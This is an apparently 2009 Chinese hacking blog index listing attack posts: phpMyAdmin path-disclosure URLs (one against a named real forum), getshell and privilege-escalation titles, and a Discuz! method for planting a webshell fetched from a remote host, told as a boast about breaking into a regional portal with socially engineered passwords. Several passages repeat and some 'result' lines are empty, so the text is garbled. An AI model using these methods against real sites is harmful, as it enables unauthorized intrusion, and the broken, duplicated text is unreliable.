MSN Editor 漏洞
作者:admin 日期:2009-11-28
新的提权思路
作者:admin 日期:2009-11-27
米拓信息后台上传漏洞(Bincker)
作者:admin 日期:2009-11-25
电子斗音乐get shell漏洞
作者:admin 日期:2009-11-25
phpmyadmin爆路径方法
作者:admin 日期:2009-11-24
phpmyadmin爆路径方法:直接在浏览器中访问phpmyadmin中的layout.inc.php文件,这个文件存放目录是themes/darkblue_orange,实例看测试地址:
http://bbs.pjhome.net/phpmyadmin/themes/darkblue_orange/layout.inc.php
返回结果如下:
http://bbs.pjhome.net/phpmyadmin/themes/darkblue_orange/layout.inc.php
返回结果如下:
Tags: PHPmyadmin 爆路径
利用Mysql和PHPmyadmin提权入侵
作者:admin 日期:2009-11-24
1:phpmyadmin 后台拿webshell
phpmyadmin爆路径方法:
weburl+phpmyadmin/themes/darkblue_orange/layout.inc.php
http://url/phpmyadmin/libraries/select_lang.lib.php
pphpmyadmin/libraries/export/xls.php
phpmyadmin爆路径方法:
weburl+phpmyadmin/themes/darkblue_orange/layout.inc.php
http://url/phpmyadmin/libraries/select_lang.lib.php
pphpmyadmin/libraries/export/xls.php
Tags: MySQL PHPmyadmin
IE7.0 异常CSS导致内存破坏漏洞
作者:admin 日期:2009-11-24
Discuz!的牛逼拿Webshell法,测试可行
作者:admin 日期:2009-11-23
无意中入侵了邢台某门户网站,可拿不到Webshell,郁闷中发现里面有个Discuz!论坛,马上根据已经拿到的密码社工,呵呵,居然成功进入后台!可是毕竟是6.0+的版本(管理员把版权去掉了),网上众所周知的编辑模板(模板编辑功能受限)办法来拿SHELL很是不爽,想起来编辑任意模板文件,然后eval出SHELL的方法,终于搞定!下面就是方法的实现步骤:
目前通吃所有DZ版本。
1. 随便选一模板文件,选择编辑
2. 找一个空间上传一个webshell, 假定其地址为http://www.abc.com/shell.txt
3. 在任意位置输入:
目前通吃所有DZ版本。
1. 随便选一模板文件,选择编辑
2. 找一个空间上传一个webshell, 假定其地址为http://www.abc.com/shell.txt
3. 在任意位置输入:
Tags: Discuz!
